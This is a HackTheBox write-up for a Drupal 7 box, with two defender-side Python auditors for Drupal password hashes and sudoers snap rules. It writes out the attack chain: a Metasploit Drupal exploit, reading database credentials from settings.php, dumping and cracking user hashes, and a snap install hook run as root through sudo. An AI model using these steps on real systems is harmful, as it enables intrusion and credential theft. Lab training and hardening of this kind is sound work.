
### Port Scanning and General Enumeration (Nmap)
My **all-ports (`-p-`)** scan showed only 22 and 80 open. Not much.

Tons of disallows in **robots.txt**, but nothing super interesting. The **Drupal** version number is worth noting though. Is 7 vulnerable to anything?

---
### Access (searchsploit, metasploit, drupal)
Let's check **searchsploit** for **Drupal 7**.

Looks like there's a Ruby module for Metasploit:
1. `msfconsole`
2. `search drupal 7`
3. `use 4`
4. `set lhost tun0`
5. `set rhosts MACHINEIP`

Using module 4 we get a shell as `apache`, but it's a really bad shell.
After some Googling for its location, I found the **Drupal config file** at `/var/www/html/sites/default/settings.php`.
Database creds in that file!

`mysql -u drupaluser -p`

I can't get any output from mysql, but it's working:
1. `use drupal;`
2. `select name, pass from users;`

Saved the hash and ran it through John.

The cracked hash gave us the password for the **brucetherealadmin** account. SSH in and capture the user flag!
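
The defender-side counterpart to the hash-cracking step, as an added example (not code from the original writeup): an auditor that classifies the hashes pulled from Drupal 7's `users` table by algorithm and cost, so that low-cost or legacy MD5 hashes can be rotated before a leaked dump ever reaches John. The layout of a `$S$` hash, the `U$` upgrade prefix, the `$P$`/`$H$` phpass form and the 7..30 cost bounds are Drupal 7's own (core `password.inc`); the sample rows and the weak-cost threshold of 2^15 are assumptions constructed for this example.

```python
"""Audit Drupal 7 password hashes for algorithm and cost parameter.

Added example, not part of the original writeup. Layout of a Drupal 7 hash
(from core's password.inc):

    $S$ <cost> <8-char salt> <43-char digest>       55 chars, iterated SHA-512
    $P$ / $H$ <cost> <8-char salt> <22-char digest> 34 chars, phpass-style MD5
    U$S$...   a Drupal 6 MD5 hash re-wrapped by the upgrade (md5(password) is hashed)

<cost> is one character; its index in ITOA64 is log2 of the iteration count.
"""

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MIN_COUNT_LOG2, MAX_COUNT_LOG2 = 7, 30   # Drupal 7 rejects hashes outside this range
SHA512_HASH_LENGTH, MD5_HASH_LENGTH = 55, 34
WEAK_COUNT_LOG2 = 15                      # assumed audit threshold for this example


def parse_drupal_hash(stored: str) -> dict:
    """Classify one stored hash; 'valid' is False for anything Drupal 7 could not verify."""
    info = {"valid": False, "legacy_md5_wrapped": False, "algo": None,
            "count_log2": None, "iterations": None, "salt": None}
    h = stored
    if h.startswith("U$"):                # Drupal 6 hash carried over by the upgrade path
        info["legacy_md5_wrapped"] = True
        h = h[1:]
    if h[:3] == "$S$":
        info["algo"], expected_len = "sha512", SHA512_HASH_LENGTH
    elif h[:3] in ("$P$", "$H$"):
        info["algo"], expected_len = "md5", MD5_HASH_LENGTH
    else:
        return info                        # plaintext, another CMS, or garbage
    body = h[3:]
    if len(h) != expected_len or any(c not in ITOA64 for c in body):
        return info
    count_log2 = ITOA64.index(body[0])
    if not MIN_COUNT_LOG2 <= count_log2 <= MAX_COUNT_LOG2:
        return info
    info.update(valid=True, count_log2=count_log2, salt=body[1:9],
                iterations=(1 << count_log2) + 1)   # one initial digest plus 2^n in the loop
    return info


def audit_users(rows):
    """rows: (name, pass) pairs as selected from the users table. Returns (name, reason) findings."""
    findings = []
    for name, stored in rows:
        info = parse_drupal_hash(stored)
        if not info["valid"]:
            findings.append((name, "unrecognised or malformed hash"))
        elif info["legacy_md5_wrapped"] or info["algo"] == "md5":
            findings.append((name, "MD5-based legacy hash; force a password reset"))
        elif info["count_log2"] < WEAK_COUNT_LOG2:
            findings.append((name, f"low cost 2^{info['count_log2']} iterations"))
    return findings


# Constructed sample rows (salts/digests are filler, not real hashes from the box).
SAMPLE_ROWS = [
    ("admin",   "$S$D" + "saltsalt" + "x" * 43),   # sha512, cost 2^15
    ("editor",  "$S$5" + "saltsalt" + "x" * 43),   # sha512, cost 2^7: weak
    ("olduser", "U$S$D" + "saltsalt" + "x" * 43),  # Drupal 6 MD5 wrapped
    ("import",  "$P$B" + "saltsalt" + "y" * 22),   # phpass MD5
    ("broken",  "plaintext"),                      # not a Drupal hash at all
]

if __name__ == "__main__":
    for name, reason in audit_users(SAMPLE_ROWS):
        print(f"{name:10s} {reason}")
```

Drupal 7 only upgrades a hash to the currently configured cost on that user's next successful login, so the accounts this flags are the ones that have not logged in since the cost was raised or since the Drupal 6 migration; a forced reset is the only way to get rid of those hashes.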

---
### Privesc (sudo, snap, fpm, gtfobins)
`sudo -l`

GTFOBins for snap:
https://gtfobins.github.io/gtfobins/snap/
Follow the directions and use **fpm** to generate the snap file we need; however, before you upload it, edit its `/meta/hooks/install` file. Mine just cats the flag, but you can use whatever command you want.
```sh
#!/bin/sh
# Install hook: snapd runs this as root while installing the snap.
# The trailing 'false' makes the hook exit non-zero, so the install is
# reported as failed and the snap is not left installed afterwards.
cat /root/root.txt; false
```
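
As an added defender-side example (not code from the writeup, from GTFOBins or from any project), here is a small sudoers auditor that flags the kind of rule this step relies on: an entry that lets a user run `snap` (or `ALL`) as root. Because snap executes a package's hooks as root during installation, such a rule is equivalent to granting `ALL`. The sudoers text inside the block is constructed, and the binary set and the flagging rule are assumptions made for the example; it parses the sudoers files themselves, not the differently formatted output of `sudo -l`.

```python
"""Audit sudoers rules for commands that amount to 'ALL' via snap.

Added example, not from the original writeup. It handles the common one-line
user specification
    user  host = (runas_user[:runas_group])  [TAG:] cmd [args][, cmd ...]
plus backslash continuations. Full-line comments, Defaults, alias definitions
and #include/@include directives are skipped, so rules hidden behind a
Cmnd_Alias or living in an included file are NOT resolved by this parser.
"""
import re

# snap runs the package's hooks as root during install, so any rule that lets a
# user install snaps is equivalent to ALL. The set is intentionally limited to
# the binary discussed on this page (an assumption); extend it from your own inventory.
INSTALLER_BINARIES = {"snap"}

RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<body>.+)$"
)
TAG_RE = re.compile(
    r"^(?P<tag>NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|"
    r"LOG_INPUT|NOLOG_INPUT|LOG_OUTPUT|NOLOG_OUTPUT):\s*"
)
SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")


def parse_sudoers(text: str) -> list:
    """Return one dict per (user spec, command) pair."""
    rules, pending = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#@":          # comments and include directives
            continue
        if line.endswith("\\"):                  # continuation: glue to the next line
            pending += line[:-1] + " "
            continue
        line, pending = pending + line, ""
        if line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = False                          # a tag applies to the rest of the list
        for chunk in m.group("body").split(","):
            cmd = chunk.strip()
            while (t := TAG_RE.match(cmd)):
                if t.group("tag") == "NOPASSWD":
                    nopasswd = True
                elif t.group("tag") == "PASSWD":
                    nopasswd = False
                cmd = cmd[t.end():]
            rules.append({"user": m.group("user"), "host": m.group("host"),
                          # sudo's default runas user is root when no list is given
                          "runas": (m.group("runas") or "root").split(":")[0].strip(),
                          "nopasswd": nopasswd, "command": cmd})
    return rules


def _installer_rule(cmd: str) -> bool:
    """True when the rule lets the user reach an installer's install path."""
    parts = cmd.split()
    if not parts:
        return False
    base = parts[0].rsplit("/", 1)[-1]
    args = parts[1:]
    # No argument restriction, an explicit install, or a wildcard all allow installs.
    return base in INSTALLER_BINARIES and (not args or args[0] == "install" or "*" in cmd)


def audit_rules(rules: list) -> list:
    """Flag rules that grant root-equivalent execution; root's own rule is noise and skipped."""
    findings = []
    for r in rules:
        if r["user"] == "root" or r["runas"] not in ("ALL", "root"):
            continue
        if r["command"] == "ALL":
            reason = "unrestricted command list (ALL)"
        elif _installer_rule(r["command"]):
            reason = "can install packages whose hooks run as root; treat as ALL"
        else:
            continue
        findings.append({"user": r["user"], "command": r["command"],
                         "nopasswd": r["nopasswd"], "reason": reason})
    return findings


# Constructed sample; not the box's real sudoers, only the shape of such entries.
SAMPLE_SUDOERS = """\
# sample /etc/sudoers (constructed)
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
brucetherealadmin ALL=(root) NOPASSWD: /usr/bin/snap install *
deploy  ALL=(root) /usr/bin/systemctl restart nginx, \\
        /usr/bin/snap list
webops  ALL=(www-data) /usr/bin/snap
"""

if __name__ == "__main__":
    for finding in audit_rules(parse_sudoers(SAMPLE_SUDOERS)):
        tag = "NOPASSWD " if finding["nopasswd"] else ""
        print(f'{finding["user"]:18s} {tag}{finding["command"]:32s} {finding["reason"]}')
```

Run it against `/etc/sudoers` and every file in `/etc/sudoers.d/` (as root; they are mode 0440). A rule like `snap list` is left alone because the arguments are pinned, while an unrestricted `snap` or a wildcarded `snap install *` is reported; rules that run as a non-root user are skipped since the hooks would not execute as root.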

Root flag!

---
Back to [[HackTheBox Index]]
Tags: #htb #metasploit #johntheripper #hashcracking #snap
Related: